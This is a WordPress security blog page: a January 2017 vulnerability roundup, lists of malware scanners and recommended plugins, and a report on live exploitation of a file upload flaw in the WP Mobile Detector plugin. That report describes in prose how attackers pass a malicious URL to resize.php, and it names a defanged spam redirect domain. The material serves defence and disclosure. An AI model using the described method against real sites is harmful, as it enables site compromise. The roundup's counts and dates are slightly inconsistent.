WordPress Vulnerabilities: Core, Plugins & Themes Vulnerabilities Roundup for January 2017


In January 33 WordPress plugin vulnerabilities were reported, and 12 in WordPress core. Since we have been keeping a record of reported vulnerabilities, this has been the busiest month for WordPress core vulnerability. All these vulnerabilities are all a good sign, that WordPress is simply becoming a more secure software, as explained in Crunching the numbers, how secure WordPress is?

Below is the complete list of all the WordPress plugins and themes vulnerabilities reported in December 2016:

WordPress Vulnerabilities in Plugins

  • CSRF ad XSS vulnerabilities in ABASE plugin
  • Arbitrary file upload vulnerability in Seo Spy plugin
  • Arbitrary file upload vulnerability in PHP Analytics plugin
  • Arbitrary file upload vulnerability in Social plugin
  • Remote Code Execution (RCE) in Google Maps by Daniel Martyn plugin
  • Arbitrary file upload vulnerability in ChikunCounter plugin
  • Arbitrary File Upload Vulnerability in Developer Tools plugin
  • Unauthenticated PHP Object injection in CMS Commander Client plugin
  • Unauthenticated PHP Object injection in Google Forms plugin
  • Arbitrary File Upload vulnerability in DOP Slider plugin
  • CSRF and XSS vulnerabilities in Hupso Share Buttons for Twitter, Facebook & Google+ plugin
  • Open redirect vulnerability in moreAds SE
  • Reflected Cross-Site Scripting (XSS) Vulnerability in moreAds SE plugin
  • Information Disclosure Vulnerability in W3 Total Cache plugin
  • CSRF and XSS in Arigato Autoresponder and Newsletter plugin
  • Reflected Cross-Site Scripting (XSS) vulnerability in Event Notifier plugin
  • Remote Local File Inclusion in Direct Download for WooCommerce
  • Reflected Cross-Site Scripting (XSS) Vulnerability in WangGuard plugin
  • SQL Injection in 404 Redirection Manager
  • Reflected Cross-Site Scripting (XSS) Vulnerability in Super Socializer
  • Cross-Site Scripting (XSS) & CSRF in Responsive Poll plugin
  • Privilege Escalation in WP Support Plus Responsive Ticket System plugin
  • PHP Object Injection Vulnerability in Post Grid plugin
  • Username enumeration bypasses in Stop User Enumeration plugin
  • Cross-Site Scripting (XSS) in Chained Quiz plugin
  • Cross-site Scripting vulnerability in WooCommerce plugin
  • Authenticated Arbitrary File Deletion in Slider plugin
  • Authenticated Path Traversal in XCloner – Backup and Restore plugin
  • Authenticated Arbitrary File Deletion Vulnerability in BuddyPress
  • Information disclosure in Pike Firewall WordPress plugin

WordPress Vulnerabilities in Core

  • Unauthenticated privilege escalation in a REST API endpoint
  • Cross-Site Scripting (XSS) in posts list table
  • SQL Injection in WP_Query
  • Press This available to unauthorised users
  • Cross site request forgert (CSRF) in WordPress prior to 4.7.1
  • Information Disclosure in WordPress prior to 4.7.1
  • Cross-site request forgery (CSRF) in the accessibility mode of widget editing
  • Cross-site scripting (XSS) vulnerability via theme name fallback
  • Cross-site request forgery (CSRF) bypass via uploading a Flash file.
  • Cross-site scripting in update-core.php
  • User information disclosure in WordPress Rest API
  • Remote code execution vulnerability in PHPMailer (shipped with WordPress)

You can read the release notes of WordPress 4.7.1 for more information on the above mentioned WordPress vulnerabilities in Core that are not linked.


Source: WPWhiteSecurity

, ,

Top 5 Useful Tools to Scan Websites for Virus and Malware Infection

Aside from periodically scanning our PCs for viruses, there is also a need to scan websites for virus or malware infection. A virus or malware infection of any website can have overwhelming consequences on the overall performance of the website, the hosting server and the site owner.

There are several websites offering useful tools online for webmasters to scan websites. These scans provide useful information and helpful security tips.

Some of these providers have also WordPress plugins to scan WordPress powered websites. These plugins will scan websites for malware, trojans, backdoors, worms, viruses, shells, spywares and other threats as well as JavaScript code obfuscation, exploits, malicious iframes, malicious code injection, malicious code obfuscation, auto-generated malicious content, redirects, hidden eval code and more.

Here are some of the top tools to scan websites

Sucuri Online Scan

Sucuri is a famous provider of website security solutions with specialization in WordPress. Their scanning tool works as a magnet to attract new customers. Obviously, it lets you know if your website is suffering from injected spam, defacements or malware. Sucuri has a WordPress plugin that can be easily installed and configured for use. It is a security suite meant to complement your existing security posture with seven key security features:

  1. Security Activity Audit Logging
  2. File Integrity Monitoring
  3. Remote Malware Scanning
  4. Blacklist Monitoring
  5. Effective Security Hardening
  6. Post-Hack Security Actions
  7. Security Notifications

Virus Total

VirusTotal is a simple tool to scan websites and it does a great job at that. It allows scanning a file or a URL and provides information about the viruses found. Using Virus Total is absolutely free. This great tool facilitate the quick detection of viruses, worms, Trojans and all kinds of malware on you website detected by website scanners and antivirus engines. VirusTotal is a subsidiary of Google. In spite of its simple design, behind this tool is an active community waiting for you to join them.


SpamHaus is a great security help for any type of website. It has two distinct tools: IP Address Lookup and Domain Lookup. The first tool is useful to determine if an IP address is associated with spam or illegal activities. It is called the SpamHaus Block List (SBL). The SBL is used both as a sender IP blocklist and as a URI blocklist. It is very effective as a URI blocklist. As example, if you noticed that an IP address attempted multiple times to login to your website you should check it and find additional information about.

The second tool, the Domain Lookup informs if your website is on their list of spam sources. I wish you to never be added on this list, but in case that you are, SpamHaus offers you information about how to resolve your security issues and finally, be erased from the list.


Quttera is another impressive free tool that should be used periodically to scan websites. It is a cloud based application that scans websites and generates scan reports. It checks URIs for suspicious scripts, malicious files and other threat hidden into legitimate contents on websites. It analyses a lot of files, therefore it takes some minutes before listing the result. Due to the multiple scan website being analysed simultaneously, it is possible to get a message requiring you to try the service later. It’s not Ok, but the services are free and top-quality, so a little bit of patience is golden!

The Quttera Web Malware Scanner plugin provided in the WordPress plugin repository scans your WordPress website for known and unknown malware and other suspicious activities.


Unlike the previous tools, this requires a subscription, but it’s similar in terms of efficiency and usefulness. Acunetix is a security leader and their online scan offers lots of precious information. It detects and reports a wide array of vulnerabilities in applications built on architectures such as WordPress, PHP, ASP.NET, Java Frameworks, Ruby on Rails and many others. Acunetix Vulnerability Scanner can be used to scan for vulnerable WordPress plugins and can also be used to conduct other WordPress specific configuration tests such as week WordPress admin passwords, username enumeration and WordPress configuration file disclosure. The Acunetix WordPress plugin identifies malicious plugins, themes and URL within website pages.

Do you use any other tools not mentioned here, please let me know so I also check them out.

List of Important WordPress Plugins you must install on your website

Do you have an existing WordPress site or you are just developing your website, compiled here are list of the most Important WordPress Plugins you must have installed on your website.

WordPress is designed to be lean and lightweight with a lot of features and flexibilities, but there is still a lot of functionality missing from it. Plugins are designed to fill in these missing functions. Plugins offers custom functions and features so that users can tailor their sites to their specific needs.


Plugins are used to extend and add to the functionality that already exist in WordPress


The best way to fill in the missing pieces is to get yourself the right plugins. It is often confusing trying to pick out the plugins to install among the many that are available. I will admit that it can be difficult sometimes to sort out the good from the, well, not so good. But I have tried to simplify the process of choosing the most important WordPress plugins you should use. I have also provided links to these important WordPress plugins where necessary.

WordPress Plugins are available from several sources. The most popular and official source for WordPress Plugins is the WordPress Plugin Directory.

So here is a collection of free and premium important wordpress plugins you must have installed on your website. There are various options included for everything from caching, seo, to security and backup.

The Most Important WordPress Plugins are for:



This is one of the first set of important wordpress plugins I will recommend you install after installing WordPress for your website. Every webmaster or web owner should install one or two of these plugins to secure their website. Some of these plugins are Wordfence Security, WPS Hide Login, Sucuri Security, iThemes Security (formerly Better WP). Installing any of these plugins with further protect your WordPress website from malware, brute force attack, login security etc. I have these plugins installed on my various websites.


As the name implies, these plugins adds SEO functionalities to a website. Aside from security, this is another important WordPress plugin that should not be missing from your site.. The plugin I will recommend are Yoast SEO and All in One SEO Pack. These plugins helps to write better contents, choose focus keywords in each articles and makes sure the focus keywords are used constantly throughout the article.


Spam comments are unsolicited comments posted on websites by a broad category of spambot or spammer. Most spam comments are advertisements. AntiSpam plugins usually check each comments to see if they look like spam or not and let you review the spam comments it blocked. Without antispam plugins, you stand no chance against SPAM. The most popular antispam plugin for WordPress is Akismet. Akismet does a good job at catching SPAM comments.


Tracking the number of visitors on your website need not be a hard task. These plugins allows you to easily track you site. It is important to install any of these plugins so that you can be able to measure the growth of your website. An example is Google Analytics Dashboard for WP. This plugin enables you to track your site using the latest Google Analytics tracking code and allows to view Key Google Analytics Report on your WordPress Dashboard.


WordPress caching is the fastest way to improve website performance, reduce download time etc.. WordPress cache plugins cache WordPress posts and pages as static files which are then served to users. This can improve the overall performance several hundred times. Some popular Caching plugins are WP Total Cache and WP Super Cache.


Very useful if you want your visitors to share your contents like blog posts and pages via the social media and email. Social sharing is a very powerful tool to increase your site traffic and boost your website social engagement. Check out some of the available social sharing plugins here.


This is an important WordPress plugins that work by displaying after a related posts after the original post post, i.e. similar posts that are in the same category with the original post. Displaying links to related content to help your readers enjoy reading posts on your site. This helps to increase the time visitors spend on your site and also increase your chance of engagement with them. This function is already incorporated in some premium themes but if yours doesn’t have it, then related post plugins are a way to go and you can download from the numerous plugins here.


These plugins place a form on your site which allows visitors to subscribe for future posts or newsletters from your blog. This is a great way to build an email marketing list. They are a very essential tool to engage website visitors for any website. You need to have one installed so that you can start capturing emails of your site visitor early. You can then grow your subscriber list, engage with visitors convert visitors and decrease bounce rate. Check out some here.


Do you have a favorite plugin from this list? Is there any WordPress plugin that you think is absolutely essential for every WordPress site? Indicate in the comments below.

WP Mobile Detector Plugin Vulnerability is being Exploited


WP Mobile Detector is a plugin that automatically detects standard and advanced mobile devices and displays a compatible WordPress mobile theme. The WP Mobile Detector WordPress plugin automatically detects if the visitor is using a standard mobile phone or a smart phone and loads a compatible WordPress mobile theme for each.

For the last few days, Sucuri noticed that an increasing number of websites were infected without any outdated plugin or known vulnerability. In most cases it was a porn spam infection. Then the research team started to dig into the issue and found that the common denominator across these WordPress sites was the plugin WP Mobile Detector that had a 0-day arbitrary file upload vulnerability disclosed on May 31st by the Plugin Vulnerabilities team. The plugin has since been removed from the WordPress repository and no patches are available.

The vulnerability is very easy to exploit, all the attacker needs to do is send a request to resize.php or timthumb.php (yes, timthumb, in this case it just includes resize.php), inside the plugin directory with the backdoor URL. This vulnerability was publicly disclosed May 31st, but according to our firewall logs, the attack has been going since May 27th.

It’s a simple vulnerability that stems from failing to validate and sanitize input from untrusted sources. No security checks are performed and an attacker can feed the src variable with a malicious URL that contains a PHP code.

It highly recommended that everyone should remove this plugin for now. If you really need this plugin, the partial temporary fix will be to disable PHP execution in the wp-mobile-detector/cache subdirectory, for example using this code in the .htaccess file.

<Files *.php>
deny from all

Please note that this fix will only save you from executing malware on your server. Hackers will still be able to upload files to the cache subdirectory and use links to them in attacks to third-party sites (iframes, scripts, malicious downloads) or just to host spammy/illegal content. You can also revoke write permissions in the cache subdirectory altogether, but it may break  the plugin functionality.
The guys at Sucuri have been testing this exploits against the most popular WordPress security plugins offering application level firewalls and other preventive measures, it has successfully evaded all existing preventive controls. Sites behind the Sucuri Firewall have been patched via the systems virtual hardening engine that sits at the edge since its release.

At this moment the majority of the vulnerable sites are infected with the porn spam doorways. You can usually find the gopni3g directory in the site root, that contains story.php (doorway generator script), .htaccess and subdirectories with spammy files and templates. The doorways redirect visitors to hxxp://bipaoeity[.]in/for/77?d=.